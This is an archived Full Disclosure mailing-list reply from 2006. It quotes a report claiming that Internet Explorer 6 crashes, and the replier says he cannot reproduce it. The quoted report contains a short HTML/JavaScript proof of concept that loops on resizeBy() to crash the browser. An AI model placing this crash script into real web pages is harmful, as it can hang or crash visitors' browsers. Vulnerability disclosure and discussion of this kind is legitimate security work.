Full Disclosure mailing list archives
Re: Internet Explorer Ver 6.0.2800.1106 vulnerability
From: "yuanfan bai" <baiyuanfan () gmail com>
Date: Sat, 27 May 2006 00:48:08 +0800
In my winxp and win2k3 all run steadily, not any exception.. 2006/5/26, r k <kgp.143 () gmail com>:
Hi All,
IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html page.
the following is the code
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<html>
<head>
<title>Internet Explorer Ver 6.0.2800.1106</title>
</head>
<body>
<script>
var wwidth = (window.innerWidth)?window.innerWidth: ((document.all)?document.body.offsetWidth:null);
while (wwidth)
{
self.resizeBy(-999999, -1);
}
</script>
</body>
</html>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
tested on windows 2000,windows XP
thank you
antar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Internet Explorer Ver 6.0.2800.1106 vulnerability r k (May 26)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability Tonu Samuel (May 26)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability ad () heapoverflow com (May 26)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability yuanfan bai (May 26)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability str0ke (May 26)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability Alexander Sotirov (May 26)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability Tonu Samuel (May 26)
